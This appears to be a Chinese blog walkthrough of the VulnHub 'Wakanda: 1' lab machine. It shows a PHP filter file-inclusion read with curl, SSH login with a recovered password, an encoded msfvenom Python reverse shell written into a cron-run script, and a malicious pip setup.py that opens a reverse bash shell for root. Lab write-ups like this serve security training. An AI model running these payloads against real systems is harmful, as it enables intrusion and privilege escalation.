vulnhub-wakanda 1靶机

于 2024-09-29 08:33:22 发布
阅读量874 收藏 10
点赞数 20
文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjSteve/article/details/142626120
版权

vulnhub:wakanda: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

image-20240926152759728

靶机在192.168.81.5,扫描端口

image-20240926152947463

四个端口,详细扫描一下

image-20240926153236988

似乎没什么值得注意的,先看网站

image-20240926153416976

就这一个页面,点按钮也没反应,扫目录

image-20240926153730985

虽然扫到了,但是所有页面大小都是0B,也就是没有任何内容返回

回去再查看一下页面,发现有这么一行注释

image-20240926153856542

加上注释里的参数后,页面变成了法语

image-20240926153944034

尝试这个功能点是否存在文件包含

php://filter/convert.base64-encode/resource=index

image-20240926154501646

返回了一些东西,使用curl完整的拿下来

curl http://192.168.81.5/?lang=php://filter/convert.base64-encode/resource=index

image-20240926154603834

Base64解码

image-20240926154649321

找到一个密码

Niamey4Ever227!!!

网站底下写着站长mamadou,猜测是他的密码,尝试连接,之间扫描到ssh端口为3333

image-20240926154831767

连接成功后出来的不是shell而是Python命令行,需要用Python生成交互式shell

image-20240926155123997

找到第一个flag

image-20240926155308160

在tmp文件夹下找到文件test,里面什么都没有,但是这个文件属于devops

查找devops的文件

find / -user devops 2>/dev/null

image-20240926155508478

找到一个py文件,查看

image-20240926155553466

看起来这个文件在不停的执行命令,并且我们有写入权限,写个木马进去

msfvenom -p cmd/unix/reverse_python lhost=192.168.81.4 lport=6789 R

image-20240926155745062

python -c "exec(import('zlib').decompress(import('base64').b64decode(import('codecs').getencoder('utf-8')('eNqVkMEKgzAMhl+l9NTCqKsMp4weZDgYYxtM7zK7DmWuLUbff0idHnoyl58kX/6ENF9ruh6BkR/Vow1yAUNlOyMVwFwygP5xmLQ20AvMk5DxKGYxZzvsMaO7iPZx4nVAuKXMCZmy9FSeb1mxnOLK+f14KfPikaVX6lsxabRWsidkvGmeHZdTHzfAXoMNCbB30yptCJ0ntqtovooOfdqK5dNMPtuW4KBqdAA1pj9b5WII')[0])))"

我们只需要写入双引号里的东西

echo "exec(import('zlib').decompress(import('base64').b64decode(import('codecs').getencoder('utf-8')('eNqVkMEKgzAMhl+l9NTCqKsMp4weZDgYYxtM7zK7DmWuLUbff0idHnoyl58kX/6ENF9ruh6BkR/Vow1yAUNlOyMVwFwygP5xmLQ20AvMk5DxKGYxZzvsMaO7iPZx4nVAuKXMCZmy9FSeb1mxnOLK+f14KfPikaVX6lsxabRWsidkvGmeHZdTHzfAXoMNCbB30yptCJ0ntqtovooOfdqK5dNMPtuW4KBqdAA1pj9b5WII')[0])))" > .antivirus.py

image-20240926155918671

监听,稍作等待(大概需要几分钟)

image-20240926160235090

现在获取到了devops的shell,之前搜索文件时看到他的家目录有第二个flag

image-20240926160326605

sudo -l显示我们可以无密码执行pip,查看漏洞网站利用方式

image-20240926160451944

找到一个exp

from setuptools import setup
from setuptools.command.install import install
import base64
import os
 
 
class CustomInstall(install):
    def run(self):
        install.run(self)
        RHOST = '192.168.81.4' 
 
        reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 9876; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
        encoded = base64.b64encode(reverse_shell)
        os.system('echo %s|base64 -d|bash' % encoded)
 
 
setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='andre.marques@esecurity.com.br',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

使用时记得改成kali的IP

在kali创建文件后,开启Python的HTTP服务,在靶机下载文件

image-20240926161752205

靶机运行

sudo /usr/bin/pip install . --upgrade --force-reinstall

kali监听

image-20240926161900948

提权完成,最后的flag在root目录

生草工坊
关注
ionic-starter-wakanda:Ionic Wakanda 的空白启动项目
07-17
它缺少 Ionic 库和 Angular-Wakanda。 要使用它,请使用 ionic node.js 实用程序创建一个新的 ionic 项目,或者将其复制并粘贴到现有的 Cordova 项目中,然后单独下载 Ionic 的发行版。 先决条件 当然你需要节点,...
angular-wakanda-upload
05-22
以上就是"angular-wakanda-upload"示例的基本工作原理。通过结合AngularJS的强大功能和Wakanda的全栈JavaScript环境,我们可以构建出高效、健壮的文件上传系统。对于开发者来说,这种组合提供了一种无缝的开发体验,...
Vulnhub入门实战-Wakanda
qq_24033605的博客
07-14 2280
下载链接 描述: 1.探测主机的IP地址 2.使用nmap查看靶机开放端口。 开放了4个端口,老样子先从http下手。 3.进去发现没什么可以点的,于是进行目录扫描。 状态码都是200,但是size为0,所以返回的都是空页面。 查看主页源代码,发现一个注释。 猜测存在本地文件包含漏洞,抓包看一下。 成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。 账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!! 这里的使用凭证是有效的,但是还
vulnhubWakanda :1靶机
wbplife的博客
08-07 663
lang=fr表示语言为法语,可以设置成中文,英语等语言,既然这个lang可以改变语言,那么说明改变语言使用了语言php文件,那么关联的就是文件包含漏洞了,页面没什么可以下手的地方,那我们就构造url,这里就关联到一个知识点,也是我们要用到的:php://filter.它是php中一个独有的协议,它作为一个中间流来处理其流,比如我们可以将我们手上的源码用base64解码来dowm下来.创建一个恶意setup.py并上传到tmp目录,和上面的方法一样,创建文件,并远程下载到/tmp目录下面。
VulnHub实战篇二:Wakanda-1靶机渗透记录
a1004070060的博客
04-05 1084
0x01靶机信息 靶机名称:Wakanda-1 下载地址:https://download.vulnhub.com/wakanda/wakanda-1.ova 操作系统:debian 渗透目标:获取root权限,取得三个flag 0x02信息搜集 1.主机信息扫描 本地虚拟机搭建完环境后无法获悉靶机地址,需要使用主机探测工具扫描一下ip,这里使用nmap,命令如下。 nma...
vulnhub系列:wakanda-1
jq_j37的博客
08-08 422
vulnhub系列:wakanda-1靶机,打靶文章
Vulnhub靶机Wakanda渗透测试攻略
大方子
11-18 4670
百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导入Wakanda_1.ova靶机环境,修改其网络连接方式为Bridged(桥接网卡),并选择一个可用于联网的网卡(例如,我使用的无线网卡上网,在图中网卡为Inter(R) Dual Band Wireless-...
-对wakanda靶机的渗透之旅
weixin_30664539的博客
10-06 225
目录 -对wakanda靶机的渗透之旅 0x00 渗透过程 1.对靶机的信息收集 2.开始渗透靶机 3.攻破root 0x01 小知识 nmap plus python 反弹shell & pip ...
wakanda:1靶机
zdd1453691081的博客
08-08 1455
靶机运行环境:Virtual Box
靶机渗透之Wakanda
qq_43235703的博客
02-02 2809
渗透靶机Wakanda wakanda简介:Wakanda是一个新的交易市场网站,很快会上线了。你的目标是通过黑客技术找到“振金”的确切位置。本vulnhub靶机环境由xMagass开发,并托管于Vulnhub,这台靶机上包含了很多很酷的技巧。在官网可以下载,有需要的小伙伴可以私聊我拿ova. 将wakanda.ova放进vmbox里面,要是vmware能放也可以放进去,不过vmbox可以直接加...
wakanda:1靶机渗透测试
weixin_58786230的博客
08-08 869
使用命令cd /tmpls -al。
todo-wakanda:用wakanda创建的一个简单的待办事项应用
04-28
wakanda创建的一个简单的待办事项应用 可以从以下获得演示: : 本地运行 确保已安装 ,然后运行以下命令: $ git clone https://github.com/midrissi/todo-wakanda.git $ cd todo-wakanda $ npm i 然后用...
generator-wakanda-project:约曼瓦坎达项目生成器
07-08
这个非官方的Yeoman 生成器创建了 Wakanda 项目和解决方案,然后您可以从任何开发工具进行编辑,并提供 Grunt 服务任务以在 Wakanda 服务器上启动它们。 如何安装 安装 npm 并非每台新计算机都预装了 Yeoman。 他...
wakanda-node:Wakanda数据库的简单节点连接器
04-29
npm i -S midrissi/wakanda-node 初始化连接器 初始化程序返回一个Promise(有关更多信息,请参阅 ) var wakanda = require ( 'wakanda-node' ) ; var promise = wakanda . init ( { remote : { host : '...
CRM后台原型模板 #产品原型#Axure# 文件大小6.21M,系统业务分为12个核心模块:管理中心、系统公告、企业设置、组织
09-28
CRM后台原型模板 #产品原型#Axure# 文件大小6.21M,系统业务分为12个核心模块:管理中心、系统公告、企业设置、组织架构、职务权限、员工管理、模块管理、产品管理、业务设置、字段设置、字典管理、日志管理等。 对于想做产品的同学或者想深入了解CRM后台系统的朋友,极具研究学习价值和办公使用价值 致力于让产品人专注产品本身,不受原型实现的困扰~ 适合人群:互联网产品经理、学习使用axure的同学
metasploit_in_termux-master.zip
09-28
metasploit_in_termux-master.zip
基于C#、CSS、JavaScript和HTML的甜品网站设计源码
最新发布
09-28
该项目是一款甜品主题的网站设计源码,由806个文件组成,涵盖296个JPG图片、142个C#源代码文件、126个DLL库文件、44个ASPX页面文件、20个配置文件、18个缓存文件、17个PNG图片文件、16个可执行文件、14个PDB调试文件、14个JPEG图片文件。代码主要采用C#、CSS、JavaScript和HTML语言编写,适用于甜品行业的在线展示和销售需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值